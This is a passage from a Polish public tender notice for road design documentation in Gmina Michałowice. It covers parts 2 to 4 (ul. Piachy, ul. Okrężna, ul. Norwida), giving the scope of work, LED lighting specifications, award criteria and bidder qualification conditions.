projektu budowlanego (Dz. U. z 2020 r., poz. 1609 ze zm.), wraz z opisami i rysunkami niezbędnymi do realizacji robót,<br/>e)	informacja BIOZ (jeżeli będzie wymagana),<br/>f)	uzyskanie wszystkich wymaganych uzgodnień, opinii, warunków technicznych, pozwoleń, decyzji umożliwiających realizację robót w tym pozwolenie na budowę lub niezbędnych do zgłoszenia budowy wraz ze skutecznym zgłoszeniem budowy,<br/>g)	wykonanie projektów podziałów nieruchomości do decyzji ZRiD dla części 2 <br/>h)	przygotowanie materiałów niezbędnych do wniosku o zezwolenie na realizacje inwestycji drogowej wraz z uzyskaniem decyzji ZRiD dla części 2 zgodnie z zasadami i warunkami podanymi w Ustawie z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2022 r. poz. 176).<br/>i)	opracowanie operatów wodno-prawnych wraz z uzyskaniem pozwoleń wodnoprawnych (jeżeli dotyczą),<br/>j)	opracowanie projektów przebudowy urządzeń infrastruktury technicznej niezwiązanych z potrzebami zarządzania drogami lub potrzebami ruchu drogowego, kolidujących z inwestycją, w razie konieczności,<br/>k)	przygotowanie projektu inwentaryzacji zieleni warunkującego otrzymanie pozwolenia na wycinkę drzew kolidujących z inwestycją (jeżeli dotyczą),<br/>l)	opracowanie i uzgodnienie (zatwierdzenie) kompletnego projektu stałej organizacji ruchu,<br/>3)	opracowanie dokumentacji niezbędnej do wykonania zamierzenia inwestycyjnego, w tym:<br/>a)	opracowanie szczegółowych przedmiarów robót, przez które należy rozumieć opracowanie zawierające opis robót budowlanych w kolejności technologicznej ich wykonywania, z podaniem liczby jednostek przedmiarowych robót, wynikających z dokumentacji projektowej oraz podstaw do ustalenia cen jednostkowych robót lub nakładów rzeczowych; <br/>b)	opracowanie kosztorysu inwestorskiego, który należy sporządzić i przekazać w wersji pdf oraz w wersji ath. Kosztorysy należy sporządzić zgodnie z Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno- użytkowym (Dz.U. z 2021r. poz. 2458) ;<br/>c)	opracowanie szczegółowych specyfikacji technicznych wykonania i odbioru robót budowlanych, przez które należy rozumieć opracowania zawierające zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagania właściwości robót, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót oraz zakresu prac, które powinny być ujęte w cenach poszczególnych pozycji. Specyfikacje należy przygotować zgodnie z Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2021r. poz. 2454).<br/>3.	Przedmiot zamówienia obejmuje swoim zakresem opracowanie kompletnych projektów budowlanych w tym:<br/>1)	projektu zagospodarowania terenu, <br/>2)	projektu architektoniczno-budowlanego.<br/>4.	W dokumentacji projektowej Wykonawca powinien zastosować oprawy drogowe LED z energooszczędnym modułem LED charakteryzującym się wysoką skutecznością świetlną – min. 136 lm/W oraz parametry wskazane poniżej: <br/>1)	temperatura barwowa odpowiednio dobrana do funkcji i wykorzystania oświetlanego terenu, <br/>2)	lampa powinna charakteryzować się bardzo wysokim stopniem szczelności IP66 oraz odpornością na udary mechaniczne IK08,<br/>3)	zintegrowany, regulowany skokowo co 5 stopni uchwyt ma pozwolić na regulację w zakresie: 0° do +15° (szczytowy, na słupie); -15° do 0° (boczny, na wysięgniku), CLO - utrzymanie strumienia świetlnego w czasie; dodatkowe zabezpieczenie przepięciowe (SP10kV), I lub II klasa ochronności , <br/>4)	pozostałe wymagania w zakresie doboru rodzaju oświetlenia w tym m.in.:<br/>a) rodzaju opraw (zintegrowane lub nie, świecące bezpośrednio lub z odbicia - światło rozproszone), <br/>b)	temperatury barwowej w zależności od lokalizacji, <br/>c)	wymagań w zakresie energooszczędności, <br/>d)	kompensacji mocy biernej, <br/>e)	cyklu życia projektowanych urządzeń i produktów, <br/>f)	ich wpływu na środowisko zostaną uzgodnione na etapie wykonywania zamówienia.<br/>5.	Przy projektowaniu Wykonawca zobowiązany będzie wziąć pod uwagę odpowiednie rozwiązanie minimalizujące moc bierną. <br/>6.	W dokumentacji objętej przedmiotem zamówienia należy wskazać rozwiązania dostępne na rynku, które zarówno w procesie produkcji mają możliwie mały wpływ na środowisko jak i w trakcie eksploatacji, jak i po zakończeniu cyklu życia opraw/źródeł światła. Wraz z podaniem odpowiednich systemów certyfikacji/norm dzięki którym możliwa będzie weryfikacja materiałów proponowanych przez wykonawców instalacji.<br/>7.	Wykonawca jest zobowiązany do zaprojektowania wariantowego układu zdalnego sterowania oświetleniem, w tym możliwości wielostopniowej redukcji mocy oraz zdalnej kontroli stanu instalacji, instalacji do ściemniania grupowego.<br/>8.	Wykonawca zobowiązany jest do opracowania opisu urządzeń i systemów zgodnie z zasadami ustawy Pzp oraz zasadami dostępności, a także określenia jakości poprzez odniesienie do systemów certyfikacji i norm o ile są dostępne w celu weryfikacji rozwiązań proponowanych przez wykonawców instalacji oświetlenia ulicznego.<br/>9.	W ramach przedmiotu zamówienia Wykonawca opracuje dokumentację projektową dla poniższych dróg:<br/><br/><br/>2)	ulicy Piachy w Pęcicach Małych, obejmującej (część II): <br/>a)	rozbudowę drogi o długości ok. 330m z odwodnieniem, ok. 15 działek wymaga podziału do decyzji ZRiD,<br/>b) przebudowę istniejącego oświetlenia.<br/><br/>10.	Dla poszczególnych ulic objętych przedmiotem zamówienia Wykonawca zobowiązany będzie wykonać odrębną stosowną dokumentację techniczną, prawną oraz uzyskać stosowne pozwolenia na realizację inwestycji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">231 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">oferta</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest opracowanie dokumentacji projektowej dla:<br/><br/>3)	przebudowy ulicy Okrężnej w Granicy na działce nr. ew. 489, 488 obręb Granica o długości ok. 150m,<br/><br/>2.	Zakres przedmiotu zamówienia obejmuje opracowanie kompletnych projektów budowlanych obejmujących:<br/>1)	przygotowanie i uzgodnienie z Zamawiającym dwóch wielobranżowych koncepcji zagospodarowania terenu dla:<br/><br/>c)	przebudowy ulicy Okrężnej w Granicy,<br/><br/>2)	opracowanie projektu budowlanego zgodnie z obowiązującymi przepisami dla danej ulicy (części), w tym:<br/>a)	uzyskanie aktualnych podkładów geodezyjnych niezbędnych do opracowania projektu przebudowy drogi wojewódzkiej, uzyskania wszelkich opinii i uzgodnień,<br/>b)	przygotowanie materiałów niezbędnych do uzyskania prawomocnej decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, o której mowa w ustawie z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2022 r., poz. 1029 ze zm.) wraz z przygotowaniem wniosku o wydanie w/w decyzji (jeżeli dotyczą),<br/>c)	opracowanie dokumentacji geotechnicznej z rozpoznaniem warunków gruntowych,<br/>d)	opracowanie kompletnego projektu budowlanego (obejmującego wszystkie branże) wymaganego przepisami Prawa Budowlanego i spełniającego rozporządzenie Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2020 r., poz. 1609 ze zm.), wraz z opisami i rysunkami niezbędnymi do realizacji robót,<br/>e)	informacja BIOZ (jeżeli będzie wymagana),<br/>f)	uzyskanie wszystkich wymaganych uzgodnień, opinii, warunków technicznych, pozwoleń, decyzji umożliwiających realizację robót w tym pozwolenie na budowę lub niezbędnych do zgłoszenia budowy wraz ze skutecznym zgłoszeniem budowy,<br/><br/>h)	przygotowanie materiałów niezbędnych do wniosku o zezwolenie na realizacje inwestycji drogowej wraz z uzyskaniem decyzji ZRiD dla części 2 zgodnie z zasadami i warunkami podanymi w Ustawie z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2022 r. poz. 176).<br/>i)	opracowanie operatów wodno-prawnych wraz z uzyskaniem pozwoleń wodnoprawnych (jeżeli dotyczą),<br/>j)	opracowanie projektów przebudowy urządzeń infrastruktury technicznej niezwiązanych z potrzebami zarządzania drogami lub potrzebami ruchu drogowego, kolidujących z inwestycją, w razie konieczności,<br/>k)	przygotowanie projektu inwentaryzacji zieleni warunkującego otrzymanie pozwolenia na wycinkę drzew kolidujących z inwestycją (jeżeli dotyczą),<br/>l)	opracowanie i uzgodnienie (zatwierdzenie) kompletnego projektu stałej organizacji ruchu,<br/>3)	opracowanie dokumentacji niezbędnej do wykonania zamierzenia inwestycyjnego, w tym:<br/>a)	opracowanie szczegółowych przedmiarów robót, przez które należy rozumieć opracowanie zawierające opis robót budowlanych w kolejności technologicznej ich wykonywania, z podaniem liczby jednostek przedmiarowych robót, wynikających z dokumentacji projektowej oraz podstaw do ustalenia cen jednostkowych robót lub nakładów rzeczowych; <br/>b)	opracowanie kosztorysu inwestorskiego, który należy sporządzić i przekazać w wersji pdf oraz w wersji ath. Kosztorysy należy sporządzić zgodnie z Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno- użytkowym (Dz.U. z 2021r. poz. 2458) ;<br/>c)	opracowanie szczegółowych specyfikacji technicznych wykonania i odbioru robót budowlanych, przez które należy rozumieć opracowania zawierające zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagania właściwości robót, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót oraz zakresu prac, które powinny być ujęte w cenach poszczególnych pozycji. Specyfikacje należy przygotować zgodnie z Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2021r. poz. 2454).<br/>3.	Przedmiot zamówienia obejmuje swoim zakresem opracowanie kompletnych projektów budowlanych w tym:<br/>1)	projektu zagospodarowania terenu, <br/>2)	projektu architektoniczno-budowlanego.<br/>4.	W dokumentacji projektowej Wykonawca powinien zastosować oprawy drogowe LED z energooszczędnym modułem LED charakteryzującym się wysoką skutecznością świetlną – min. 136 lm/W oraz parametry wskazane poniżej: <br/>1)	temperatura barwowa odpowiednio dobrana do funkcji i wykorzystania oświetlanego terenu, <br/>2)	lampa powinna charakteryzować się bardzo wysokim stopniem szczelności IP66 oraz odpornością na udary mechaniczne IK08,<br/>3)	zintegrowany, regulowany skokowo co 5 stopni uchwyt ma pozwolić na regulację w zakresie: 0° do +15° (szczytowy, na słupie); -15° do 0° (boczny, na wysięgniku), CLO - utrzymanie strumienia świetlnego w czasie; dodatkowe zabezpieczenie przepięciowe (SP10kV), I lub II klasa ochronności , <br/>4)	pozostałe wymagania w zakresie doboru rodzaju oświetlenia w tym m.in.:<br/>a) rodzaju opraw (zintegrowane lub nie, świecące bezpośrednio lub z odbicia - światło rozproszone), <br/>b)	temperatury barwowej w zależności od lokalizacji, <br/>c)	wymagań w zakresie energooszczędności, <br/>d)	kompensacji mocy biernej, <br/>e)	cyklu życia projektowanych urządzeń i produktów, <br/>f)	ich wpływu na środowisko zostaną uzgodnione na etapie wykonywania zamówienia.<br/>5.	Przy projektowaniu Wykonawca zobowiązany będzie wziąć pod uwagę odpowiednie rozwiązanie minimalizujące moc bierną. <br/>6.	W dokumentacji objętej przedmiotem zamówienia należy wskazać rozwiązania dostępne na rynku, które zarówno w procesie produkcji mają możliwie mały wpływ na środowisko jak i w trakcie eksploatacji, jak i po zakończeniu cyklu życia opraw/źródeł światła. Wraz z podaniem odpowiednich systemów certyfikacji/norm dzięki którym możliwa będzie weryfikacja materiałów proponowanych przez wykonawców instalacji.<br/>7.	Wykonawca jest zobowiązany do zaprojektowania wariantowego układu zdalnego sterowania oświetleniem, w tym możliwości wielostopniowej redukcji mocy oraz zdalnej kontroli stanu instalacji, instalacji do ściemniania grupowego.<br/>8.	Wykonawca zobowiązany jest do opracowania opisu urządzeń i systemów zgodnie z zasadami ustawy Pzp oraz zasadami dostępności, a także określenia jakości poprzez odniesienie do systemów certyfikacji i norm o ile są dostępne w celu weryfikacji rozwiązań proponowanych przez wykonawców instalacji oświetlenia ulicznego.<br/>9.	W ramach przedmiotu zamówienia Wykonawca opracuje dokumentację projektową dla poniższych dróg:<br/><br/>3) ulicy Okrężnej w Granicy, obejmującej (część III):<br/>a) przebudowę ulicy Okrężnej na działce nr. ew. 489, 488 obręb Granica o długości ok. 150m wraz z odwodnieniem. W ramach odwodnienia należy zaprojektować przepompownie wód deszczowych.<br/><br/>10.	Dla poszczególnych ulic objętych przedmiotem zamówienia Wykonawca zobowiązany będzie wykonać odrębną stosowną dokumentację techniczną, prawną oraz uzyskać stosowne pozwolenia na realizację inwestycji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">231 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">oferta</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest opracowanie dokumentacji projektowej dla:<br/><br/>4)	przebudowy ulicy Norwida w Komorowie od ul. Wiejskiej do skrzyżowania ulic Mikołaja Reja oraz Filmowej w Granicy z odwodnieniem o długości ok 380m,<br/> na terenie Gminy Michałowice. <br/>2.	Zakres przedmiotu zamówienia obejmuje opracowanie kompletnych projektów budowlanych obejmujących:<br/>1)	przygotowanie i uzgodnienie z Zamawiającym dwóch wielobranżowych koncepcji zagospodarowania terenu dla:<br/><br/>d)	przebudowy ulicy Norwida w Komorowie od ulicy Wiejskiej do skrzyżowania ulic Mikołaja Reja oraz Filmowej w Granicy,<br/>2)	opracowanie projektu budowlanego zgodnie z obowiązującymi przepisami dla danej ulicy (części), w tym:<br/>a)	uzyskanie aktualnych podkładów geodezyjnych niezbędnych do opracowania projektu przebudowy drogi wojewódzkiej, uzyskania wszelkich opinii i uzgodnień,<br/>b)	przygotowanie materiałów niezbędnych do uzyskania prawomocnej decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, o której mowa w ustawie z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2022 r., poz. 1029 ze zm.) wraz z przygotowaniem wniosku o wydanie w/w decyzji (jeżeli dotyczą),<br/>c)	opracowanie dokumentacji geotechnicznej z rozpoznaniem warunków gruntowych,<br/>d)	opracowanie kompletnego projektu budowlanego (obejmującego wszystkie branże) wymaganego przepisami Prawa Budowlanego i spełniającego rozporządzenie Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2020 r., poz. 1609 ze zm.), wraz z opisami i rysunkami niezbędnymi do realizacji robót,<br/>e)	informacja BIOZ (jeżeli będzie wymagana),<br/>f)	uzyskanie wszystkich wymaganych uzgodnień, opinii, warunków technicznych, pozwoleń, decyzji umożliwiających realizację robót w tym pozwolenie na budowę lub niezbędnych do zgłoszenia budowy wraz ze skutecznym zgłoszeniem budowy,<br/>g)	wykonanie projektów podziałów nieruchomości do decyzji ZRiD dla części 2 <br/>h)	przygotowanie materiałów niezbędnych do wniosku o zezwolenie na realizacje inwestycji drogowej wraz z uzyskaniem decyzji ZRiD dla części 2 zgodnie z zasadami i warunkami podanymi w Ustawie z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2022 r. poz. 176).<br/>i)	opracowanie operatów wodno-prawnych wraz z uzyskaniem pozwoleń wodnoprawnych (jeżeli dotyczą),<br/>j)	opracowanie projektów przebudowy urządzeń infrastruktury technicznej niezwiązanych z potrzebami zarządzania drogami lub potrzebami ruchu drogowego, kolidujących z inwestycją, w razie konieczności,<br/>k)	przygotowanie projektu inwentaryzacji zieleni warunkującego otrzymanie pozwolenia na wycinkę drzew kolidujących z inwestycją (jeżeli dotyczą),<br/>l)	opracowanie i uzgodnienie (zatwierdzenie) kompletnego projektu stałej organizacji ruchu,<br/>3)	opracowanie dokumentacji niezbędnej do wykonania zamierzenia inwestycyjnego, w tym:<br/>a)	opracowanie szczegółowych przedmiarów robót, przez które należy rozumieć opracowanie zawierające opis robót budowlanych w kolejności technologicznej ich wykonywania, z podaniem liczby jednostek przedmiarowych robót, wynikających z dokumentacji projektowej oraz podstaw do ustalenia cen jednostkowych robót lub nakładów rzeczowych; <br/>b)	opracowanie kosztorysu inwestorskiego, który należy sporządzić i przekazać w wersji pdf oraz w wersji ath. Kosztorysy należy sporządzić zgodnie z Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno- użytkowym (Dz.U. z 2021r. poz. 2458) ;<br/>c)	opracowanie szczegółowych specyfikacji technicznych wykonania i odbioru robót budowlanych, przez które należy rozumieć opracowania zawierające zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagania właściwości robót, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót oraz zakresu prac, które powinny być ujęte w cenach poszczególnych pozycji. Specyfikacje należy przygotować zgodnie z Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2021r. poz. 2454).<br/>3.	Przedmiot zamówienia obejmuje swoim zakresem opracowanie kompletnych projektów budowlanych w tym:<br/>1)	projektu zagospodarowania terenu, <br/>2)	projektu architektoniczno-budowlanego.<br/>4.	W dokumentacji projektowej Wykonawca powinien zastosować oprawy drogowe LED z energooszczędnym modułem LED charakteryzującym się wysoką skutecznością świetlną – min. 136 lm/W oraz parametry wskazane poniżej: <br/>1)	temperatura barwowa odpowiednio dobrana do funkcji i wykorzystania oświetlanego terenu, <br/>2)	lampa powinna charakteryzować się bardzo wysokim stopniem szczelności IP66 oraz odpornością na udary mechaniczne IK08,<br/>3)	zintegrowany, regulowany skokowo co 5 stopni uchwyt ma pozwolić na regulację w zakresie: 0° do +15° (szczytowy, na słupie); -15° do 0° (boczny, na wysięgniku), CLO - utrzymanie strumienia świetlnego w czasie; dodatkowe zabezpieczenie przepięciowe (SP10kV), I lub II klasa ochronności , <br/>4)	pozostałe wymagania w zakresie doboru rodzaju oświetlenia w tym m.in.:<br/>a) rodzaju opraw (zintegrowane lub nie, świecące bezpośrednio lub z odbicia - światło rozproszone), <br/>b)	temperatury barwowej w zależności od lokalizacji, <br/>c)	wymagań w zakresie energooszczędności, <br/>d)	kompensacji mocy biernej, <br/>e)	cyklu życia projektowanych urządzeń i produktów, <br/>f)	ich wpływu na środowisko zostaną uzgodnione na etapie wykonywania zamówienia.<br/>5.	Przy projektowaniu Wykonawca zobowiązany będzie wziąć pod uwagę odpowiednie rozwiązanie minimalizujące moc bierną. <br/>6.	W dokumentacji objętej przedmiotem zamówienia należy wskazać rozwiązania dostępne na rynku, które zarówno w procesie produkcji mają możliwie mały wpływ na środowisko jak i w trakcie eksploatacji, jak i po zakończeniu cyklu życia opraw/źródeł światła. Wraz z podaniem odpowiednich systemów certyfikacji/norm dzięki którym możliwa będzie weryfikacja materiałów proponowanych przez wykonawców instalacji.<br/>7.	Wykonawca jest zobowiązany do zaprojektowania wariantowego układu zdalnego sterowania oświetleniem, w tym możliwości wielostopniowej redukcji mocy oraz zdalnej kontroli stanu instalacji, instalacji do ściemniania grupowego.<br/>8.	Wykonawca zobowiązany jest do opracowania opisu urządzeń i systemów zgodnie z zasadami ustawy Pzp oraz zasadami dostępności, a także określenia jakości poprzez odniesienie do systemów certyfikacji i norm o ile są dostępne w celu weryfikacji rozwiązań proponowanych przez wykonawców instalacji oświetlenia ulicznego.<br/>9.	W ramach przedmiotu zamówienia Wykonawca opracuje dokumentację projektową dla poniższych dróg:<br/><br/>4) ulicy Norwida w Komorowie, obejmującej (część IV):<br/>a) przebudowę ul. Norwida w Komorowie od ul. Wiejskiej do skrzyżowania ulic Mikołaja Reja oraz Filmowej w Granicy z odwodnieniem o długości ok 380m,<br/>10.	Dla poszczególnych ulic objętych przedmiotem zamówienia Wykonawca zobowiązany będzie wykonać odrębną stosowną dokumentację techniczną, prawną oraz uzyskać stosowne pozwolenia na realizację inwestycji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">231 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">oferta</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	Zdolność do występowania w obrocie gospodarczym<br/><br/>Dla wszystkich części:<br/><br/>odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej o ile podmiot ubiegający się o zamówienie publiczne prowadzi działalność gospodarczą. O zamówienie publiczne mogą również ubiegać się osoby fizyczne, które nie prowadzą działalności gospodarczej, a więc nie posiadają wpisu ani do KRS, ani do CEIDG.<br/>2)	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie wymaga posiadania specjalnych kompetencji lub uprawnień.<br/><br/>3)	Sytuacja ekonomiczna i finansowa: <br/>Zamawiający nie stawia wymagań w tym zakresie.<br/><br/>4)	Zdolność techniczna lub zawodowa: <br/><br/>a)	doświadczenie Wykonawcy: <br/>Wykonawca powinien wykazać, że w ciągu ostatnich 3 lat, przed terminem składania ofert, a jeśli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał:<br/>dla części I <br/>- min. 2 usługi polegające na opracowaniu kompletnej dokumentacji projektowo-kosztorysowej budowy lub rozbudowy, lub przebudowy drogi o długości min. 0,1 km każda, w tym co najmniej jednej z kanalizacją deszczową, które uzyskały pozwolenie na budowę lub została przyjęta zgłoszeniem;<br/>dla części II<br/>- min. 2 usługi polegające na opracowaniu kompletnej dokumentacji projektowo-kosztorysowej budowy lub rozbudowy, lub przebudowy, drogi o długości min. 0,3 km każda, w tym co najmniej jednej z oświetleniem i kanalizacją deszczową, które uzyskały pozwolenie na budowę lub została przyjęta zgłoszeniem i jednej, która uzyskała decyzję ZRID, <br/>dla części III i część IV<br/>- min. 2 usługi polegające na opracowaniu kompletnej dokumentacji projektowo-kosztorysowej budowy lub rozbudowy, lub przebudowy drogi o długości min. 0,2 km każda, w tym co najmniej jednej z kanalizacją deszczową, które uzyskały pozwolenie na budowę lub została przyjęta zgłoszeniem.<br/>UWAGA !!! W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek, o którym mowa powyżej musi spełniać w całości przynajmniej jeden z Wykonawców.<br/>Na potwierdzenie spełnienia warunku należy przedstawić wykaz usług wraz z dokumentami potwierdzającymi należyte wykonanie.<br/>Odpowiednio dla części<br/><br/>b) dysponowania osobami: <br/>Wykonawca potwierdzi spełnianie niniejszego warunku udziału w postępowaniu, jeżeli wykaże, że będzie wstanie skierować do realizacji zamówienia publicznego niżej wymienione osoby posiadające kwalifikacje zawodowe oraz uprawnienia niezbędne do wykonania zamówienia publicznego, tj. <br/>Dla części I: <br/>•	minimum 1 (jedną) osobę projektanta posiadającą uprawnienia do projektowania w specjalności drogowej oraz doświadczenie w opracowaniu kompletnej 